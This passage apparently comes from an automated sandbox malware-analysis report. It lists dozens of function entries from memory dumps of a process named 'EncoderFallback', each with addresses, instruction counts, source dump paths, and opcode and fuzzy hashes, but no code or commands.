                                                                                          • Opcode ID: 060a3402b82185e2932ad6ba4b8b0814f67ae5138ea72ade871bbf059f14a67e
                                                                                          • Instruction ID: e9768c058a456d1f16736394b3744ea4875b043835f7c8f25dc4b80f4fbbcd4f
                                                                                          • Opcode Fuzzy Hash: 060a3402b82185e2932ad6ba4b8b0814f67ae5138ea72ade871bbf059f14a67e
                                                                                          • Instruction Fuzzy Hash: CF817775A10619DFCB14DF68D584A9EBBF6FF88310B1581A9E946DB320DB30EC42CB91
                                                                                          Function 01230928 Relevance: .2, Instructions: 195COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7655624c7b90bd512fdcdaca4f6c21313a826d6221519883a88ef40594f42a32
                                                                                          • Instruction ID: cec363ce06083b2787ba7d3dea4b99c53e18ff7a7dcecb1ad59ca0a875399f9b
                                                                                          • Opcode Fuzzy Hash: 7655624c7b90bd512fdcdaca4f6c21313a826d6221519883a88ef40594f42a32
                                                                                          • Instruction Fuzzy Hash: 6F717B34B10104DFCB48DFA8D594AADBBF2BF89710F2584A9E506EB361DB71AC01CB91
                                                                                          Function 05D2087B Relevance: .2, Instructions: 168COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2105d79021e14f7b33cc33c0a711db790c36facbd0c36b7b028b86c14350b1ee
                                                                                          • Instruction ID: 3d1219847310c3967a871a91a03c2c16c53333831e1339ec72d9a4370e6d9087
                                                                                          • Opcode Fuzzy Hash: 2105d79021e14f7b33cc33c0a711db790c36facbd0c36b7b028b86c14350b1ee
                                                                                          • Instruction Fuzzy Hash: 8C711574E01228CFDB54EFA8DA48B9DBBF2FB49318F1090AAD149B7255DB309985CF01
                                                                                          Function 07399D48 Relevance: .1, Instructions: 144COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3850c064794b5ce395ae8f818de1037dbb2128badf7b8b2ae26c1071ad60adec
                                                                                          • Instruction ID: 3c085501eecda9778fe83125c0d5f40fc52ec1714f9833d7a36ede862826001a
                                                                                          • Opcode Fuzzy Hash: 3850c064794b5ce395ae8f818de1037dbb2128badf7b8b2ae26c1071ad60adec
                                                                                          • Instruction Fuzzy Hash: A451E0B5E05219CFEF04EFA9D5887EEBBBABB89310F10802AD419B3244D7742945CB51
                                                                                          Function 05D226FF Relevance: .1, Instructions: 131COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4ed3a696fb506e9e0971f15e513db2cead2ab2fa0823765197d77c977d361927
                                                                                          • Instruction ID: 285225c2b94a25edcaff2d2ad46db86e59888db1e0239b409701034e0da3f27c
                                                                                          • Opcode Fuzzy Hash: 4ed3a696fb506e9e0971f15e513db2cead2ab2fa0823765197d77c977d361927
                                                                                          • Instruction Fuzzy Hash: F551F478E04228CFDB44DFA8D944BEEBBF2FB4A314F10906AE549A7255D7345985CF10
                                                                                          Function 01238F60 Relevance: .1, Instructions: 128COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c61959827665ac76a3a751eed8e801b87208ed84c0516a0d3f70d660bc6f0a3c
                                                                                          • Instruction ID: e324758f749d9b1ebad8a81fa2c63714dd0f6b011ecd957e9f3ca4b5acbd69c8
                                                                                          • Opcode Fuzzy Hash: c61959827665ac76a3a751eed8e801b87208ed84c0516a0d3f70d660bc6f0a3c
                                                                                          • Instruction Fuzzy Hash: 544102B18293849FEB02DF7C98642A9BFB1EF83304F5581D7D244DB253D6748A88CB52
                                                                                          Function 05D207F8 Relevance: .1, Instructions: 126COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e05c20a3856341be2792ea69c27cb17a3416e85b6811091afd2ae12edd518959
                                                                                          • Instruction ID: 51f0ea834a46b0718e0cdce2550b35b88bccfa80c2fa82088f807919068837d6
                                                                                          • Opcode Fuzzy Hash: e05c20a3856341be2792ea69c27cb17a3416e85b6811091afd2ae12edd518959
                                                                                          • Instruction Fuzzy Hash: 25417A70E04218CFDB14DFAAD5487EDBBF2FB4A318F10906AD459AB654DB748885CF41
                                                                                          Function 05D20808 Relevance: .1, Instructions: 126COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 24c4c5e88acd637a8c7d91a5f53c3214a43b18f4556fe81d71096a68be94cab5
                                                                                          • Instruction ID: 10c40af3f2d324063d5de0d7773b36baf483220a97f7573f94f8c39ef97a8fd4
                                                                                          • Opcode Fuzzy Hash: 24c4c5e88acd637a8c7d91a5f53c3214a43b18f4556fe81d71096a68be94cab5
                                                                                          • Instruction Fuzzy Hash: 58416870E05228CFDB14DFAAD5487EDBBF6FB4A319F10906AD059AB264DB748885CF01
                                                                                          Function 01230918 Relevance: .1, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 99f8f3dda2b3b5f323800002f15d47ba5dece54477f873bbe1ae2104a894df60
                                                                                          • Instruction ID: 8456b322ea79b9b9aa4d6472bb20a0c71013a905fe6a49beba35159183ac3940
                                                                                          • Opcode Fuzzy Hash: 99f8f3dda2b3b5f323800002f15d47ba5dece54477f873bbe1ae2104a894df60
                                                                                          • Instruction Fuzzy Hash: 9D415B74B101049FCB44DFB8D498AADBBF2AF8D710B258569F906EB361CE719D01CB51
                                                                                          Function 05D20A0D Relevance: .1, Instructions: 113COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd5313ab34fc26410fdcf461a0e97a03f4b3046410359705cd4abc2c5e19beb3
                                                                                          • Instruction ID: 67b4a2c9fb601bc7197e7b27bdf01c94f9f9ea6a1fee1ee9274900e0fc04bd5f
                                                                                          • Opcode Fuzzy Hash: fd5313ab34fc26410fdcf461a0e97a03f4b3046410359705cd4abc2c5e19beb3
                                                                                          • Instruction Fuzzy Hash: A6416770E04218CFDB04EFA9E548BADBBF2FB49318F10906AD149BB654CB749985CF00
                                                                                          Function 05D20BE9 Relevance: .1, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 865c3925b4055b4a444b659ccae748856bd018c9bdeab52c272792513943a600
                                                                                          • Instruction ID: 3b58d9dbb36ef48bd8a164bb7e697809eb089de41d75367ead3a5231899b0cb6
                                                                                          • Opcode Fuzzy Hash: 865c3925b4055b4a444b659ccae748856bd018c9bdeab52c272792513943a600
                                                                                          • Instruction Fuzzy Hash: 49413570E08228CFDB14DFA9D5487EDBBF2FB5A319F10906AD149AB264D7749885CF00
                                                                                          Function 0123099D Relevance: .1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: acc6c73d436f62dc2869431537ec9af85f9f65d611b860fe0255fece370e64b2
                                                                                          • Instruction ID: 161b270893522d1bb549a579604f690c96560a7d971865b0af7f071db77e7a97
                                                                                          • Opcode Fuzzy Hash: acc6c73d436f62dc2869431537ec9af85f9f65d611b860fe0255fece370e64b2
                                                                                          • Instruction Fuzzy Hash: 3B412974B101049FCB44EFB8D498AADBBF2AF8C710B258469E906EB361CE709C01CB55
                                                                                          Function 05D20B36 Relevance: .1, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 61944b1e06c133f63be5b409a867fce583c738bac2f4c0cce1fae1c70cea2cd3
                                                                                          • Instruction ID: 74cbd2ffe813ee06cfff822f9d227f9c5e3a38e2ba16ba96e43c222cfe578fd9
                                                                                          • Opcode Fuzzy Hash: 61944b1e06c133f63be5b409a867fce583c738bac2f4c0cce1fae1c70cea2cd3
                                                                                          • Instruction Fuzzy Hash: 0D318870E04218CFCB04EFA9D5487EDBBF2FB5A319F10906AD049AB664CB748989CF00
                                                                                          Function 012313FC Relevance: .1, Instructions: 87COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0ee6128b2e40e2863be349fa1d7ec0f69a7bcaa92c48a923b7f4925096f8b79e
                                                                                          • Instruction ID: 3e5011790d9b7372cd92e51578a598702a931af2d8071086def18caf4c51820d
                                                                                          • Opcode Fuzzy Hash: 0ee6128b2e40e2863be349fa1d7ec0f69a7bcaa92c48a923b7f4925096f8b79e
                                                                                          • Instruction Fuzzy Hash: DE3136B0D11249EFDB14CFA9D490AEEBFF5BF88300F248029E909AB350CB349941CB50
                                                                                          Function 05D20EE0 Relevance: .1, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 76427b7e357f4cc806bbe20514cf255c4618e2c3652db477a4fe9644716e8bc3
                                                                                          • Instruction ID: c7f801ad24810546fb4df29483c3bd88130cca395255289cd3312776a5840fb3
                                                                                          • Opcode Fuzzy Hash: 76427b7e357f4cc806bbe20514cf255c4618e2c3652db477a4fe9644716e8bc3
                                                                                          • Instruction Fuzzy Hash: 84318B70E08219DBDB04DFA8D9487BEBBF6FB89308F1080AAD515B7385D7359A05CB90
                                                                                          Function 01231408 Relevance: .1, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8a43db5acef39c7d27d7c98168f7d6816881d345b982574c24981dc185a31b5e
                                                                                          • Instruction ID: 1f77f257c6eeab68e3e98de6e4a185623f976b8ce6cf0c6826a34fa42722550f
                                                                                          • Opcode Fuzzy Hash: 8a43db5acef39c7d27d7c98168f7d6816881d345b982574c24981dc185a31b5e
                                                                                          • Instruction Fuzzy Hash: 6A3128B0D11249EFDB14CFA9D590ADEBFF5BF48740F248429E509AB354DB349941CBA0
                                                                                          Function 011ED006 Relevance: .1, Instructions: 80COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2752777016.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11ed000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 27745b1a3699e8ded400a08e3eb419fb77531abd9f0c2b5282056bbd65a0eaf5
                                                                                          • Instruction ID: 25ca3bad39c9a13b0f5cebdf272e9486cd8f5de8e0b83d0a8f59b45476aa4422
                                                                                          • Opcode Fuzzy Hash: 27745b1a3699e8ded400a08e3eb419fb77531abd9f0c2b5282056bbd65a0eaf5
                                                                                          • Instruction Fuzzy Hash: 76318D7150D7C49FCB07CF64D994715BFB1AB46210F2981DBD9848F2A3C33A981ACBA2
                                                                                          Function 00EBD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2752439514.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ebd000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 244e91a2f97bca82df35fcb65c29ac5ff4be7b7816d87eda9dd2a7a16c1a99a8
                                                                                          • Instruction ID: 521f3620df8271d67072b70f904d0652c5f196be22e4288e2098577992f0f518
                                                                                          • Opcode Fuzzy Hash: 244e91a2f97bca82df35fcb65c29ac5ff4be7b7816d87eda9dd2a7a16c1a99a8
                                                                                          • Instruction Fuzzy Hash: 8A214572508200EFCB21DF14DDC0BA7BF65FB88318F20C169E9091B256D336D856CAA2
                                                                                          Function 011ED030 Relevance: .1, Instructions: 74COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2752777016.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11ed000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e00104434983c98e2c6a0c268fd39effb4b7d8591f0ab271023fd7377a81995f
                                                                                          • Instruction ID: 655cf81533e8640f10074b15ddc8b4bb315aa3a0c856b7e4d23b00254531c7c6
                                                                                          • Opcode Fuzzy Hash: e00104434983c98e2c6a0c268fd39effb4b7d8591f0ab271023fd7377a81995f
                                                                                          • Instruction Fuzzy Hash: 26210A71504644DFDF19DF94E9C8B16BFA5FB84314F24C56DD9050B246C336D406CBA2
                                                                                          Function 05D20EF0 Relevance: .1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 70d71e762672eef6b1d5fa84230b0613bb6468e0a017945e45025343bf936985
                                                                                          • Instruction ID: beffb1f3e7188d74a5c781307612cb6d0fedc70c712392ee8b9f35a9c6d477fe
                                                                                          • Opcode Fuzzy Hash: 70d71e762672eef6b1d5fa84230b0613bb6468e0a017945e45025343bf936985
                                                                                          • Instruction Fuzzy Hash: 59218970E48219DFDB04DFA9D9087AEBBF6FB89304F10806AD515B3285DB749A04CB90
                                                                                          Function 01238FC8 Relevance: .1, Instructions: 64COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a97d058f843dff9a0c8e2f5c84d2998cfb09981d15c4052d88569ffe5a26822d
                                                                                          • Instruction ID: 87c2f0442b64e3488f901ffeb21969932732dc8abc2740075f966298aed523c2
                                                                                          • Opcode Fuzzy Hash: a97d058f843dff9a0c8e2f5c84d2998cfb09981d15c4052d88569ffe5a26822d
                                                                                          • Instruction Fuzzy Hash: 29211AB0915218DFEB44DFA8D5497ADFBF5EB8A304F5081A5D519A3341DBB44A84CB01
                                                                                          Function 0123E0D0 Relevance: .1, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2755bc2bf35f6821919bb58ad6496060941988340d362a0f27ed415452a1e07f
                                                                                          • Instruction ID: bb6b2dd5fed75debfb17466bd79876514ceaec96d4da15e579f7bcae906245d7
                                                                                          • Opcode Fuzzy Hash: 2755bc2bf35f6821919bb58ad6496060941988340d362a0f27ed415452a1e07f
                                                                                          • Instruction Fuzzy Hash: 871146B4D1021ACFDF04CFA9D8456EEBBFAFB88310F11802AD514B3200D7745A89CBA1
                                                                                          Function 00EBD4BF Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2752439514.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ebd000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                          • Instruction ID: c2afc7f7843783a4ef0805b5b7ce78b3795d6e8ca5e190bc1652b101fd66e9ac
                                                                                          • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                          • Instruction Fuzzy Hash: 33112672504280DFCB12CF10D9C0B56BF71FB84328F24C6A9D8090B256C33AD85ACBA2
                                                                                          Function 05D244C7 Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 20833a4423aa1b6fdd0b21a2a710f07237709233f3faa546e22596d8bfdb293a
                                                                                          • Instruction ID: fceba6b7916130e3533683e651401ae856cb3a6b9bd779567fef9c72c94d0493
                                                                                          • Opcode Fuzzy Hash: 20833a4423aa1b6fdd0b21a2a710f07237709233f3faa546e22596d8bfdb293a
                                                                                          • Instruction Fuzzy Hash: C921E574A44229CFDF60CF24CD80BEAB7B6BB49308F1080EAA849A3241D7719A85CF10
                                                                                          Function 07382AFE Relevance: .1, Instructions: 55COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 79843937387f8eb9181ce9edd6b243b73b0ffa24726fdea5557a1105f1171388
                                                                                          • Instruction ID: 43cd02484843b4ed2599839ec8e7a4d831a7530b4a1a1f03d3a4f08223db6edc
                                                                                          • Opcode Fuzzy Hash: 79843937387f8eb9181ce9edd6b243b73b0ffa24726fdea5557a1105f1171388
                                                                                          • Instruction Fuzzy Hash: 1321E4B8A01229CFDB69DF28CA88AD9B7F5FB49304F1195E9D818A7745D7309EC18F00
                                                                                          Function 01230880 Relevance: .1, Instructions: 52COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 21ea519429d690c18f48b441f8b1eb8657db299416b5296e7202f4c9881b5462
                                                                                          • Instruction ID: 52849926e9bed227aece13c72ee53c60bb532414121c5b1de31a8e32e8f3ccff
                                                                                          • Opcode Fuzzy Hash: 21ea519429d690c18f48b441f8b1eb8657db299416b5296e7202f4c9881b5462
                                                                                          • Instruction Fuzzy Hash: 6301F5316097851FC313A73C9D206AA3FF5AFC726070946BFD085DB252EA188E0587D2
                                                                                          Function 0739A478 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cc71131ebeee8e5f298dcf5c2a0ff059c202cfaf2f5053f45cd12970965fd256
                                                                                          • Instruction ID: 5fa417987f2485c0706d7b16e465f731c437f5045524a4f2294437cdf58760bf
                                                                                          • Opcode Fuzzy Hash: cc71131ebeee8e5f298dcf5c2a0ff059c202cfaf2f5053f45cd12970965fd256
                                                                                          • Instruction Fuzzy Hash: 4B11B2B4E01219DFDB44DFA8C549AAEBBF1FB48300F2081AAD819E7351D7309A41CF91
                                                                                          Function 05D238A7 Relevance: .0, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eddae04c410c81a9e65deb4fb1f874250f2f5258b7fd0979d6068247acdb2b36
                                                                                          • Instruction ID: 5424a0d99abd29f491c20c4e3ef5ddba21d5619e5407785eda62bf056febcb19
                                                                                          • Opcode Fuzzy Hash: eddae04c410c81a9e65deb4fb1f874250f2f5258b7fd0979d6068247acdb2b36
                                                                                          • Instruction Fuzzy Hash: 6B21C278A042289FCB60DFA4D988B9DBBB2EB59318F1081DA940DA7255DB319EC5CF50
                                                                                          Function 05D24540 Relevance: .0, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 40a4336880f3134a09f6bcd8d43340f438353973bfb6f8ed6b08aea84a207b8f
                                                                                          • Instruction ID: fd68577b543a58a210ecb7fcbb524c38bc73f84e4034e1fea63de5327d5bf231
                                                                                          • Opcode Fuzzy Hash: 40a4336880f3134a09f6bcd8d43340f438353973bfb6f8ed6b08aea84a207b8f
                                                                                          • Instruction Fuzzy Hash: 5811E871948229DFDF60CF24CD80BD9B7FABB59308F1080EAA589A7251D7B19AC5CF14
                                                                                          Function 0739F4E0 Relevance: .0, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: be539ec5a11a5671ab4b8d56a5453b1ded8131280cd499a3f05f5f19bc3b43fb
                                                                                          • Instruction ID: e20c72747f19521d1603c1c32718fa060dbcb52b9c2b37c5541e7502e7e8c06a
                                                                                          • Opcode Fuzzy Hash: be539ec5a11a5671ab4b8d56a5453b1ded8131280cd499a3f05f5f19bc3b43fb
                                                                                          • Instruction Fuzzy Hash: 0611B7B0E0020A9FDB44DFA9C9557BFFBF5FF88300F20846AD518A7355DA315A418B91
                                                                                          Function 00EBD76D Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2752439514.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ebd000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 92e5343f3dc153a6c057b699735a024737fa08e6e929b19f8eea0e4915d63225
                                                                                          • Instruction ID: 9ce1c2be1b17f3b81416dde9d0af4e475a8dd709bbb3887c4e2cc1a56649da94
                                                                                          • Opcode Fuzzy Hash: 92e5343f3dc153a6c057b699735a024737fa08e6e929b19f8eea0e4915d63225
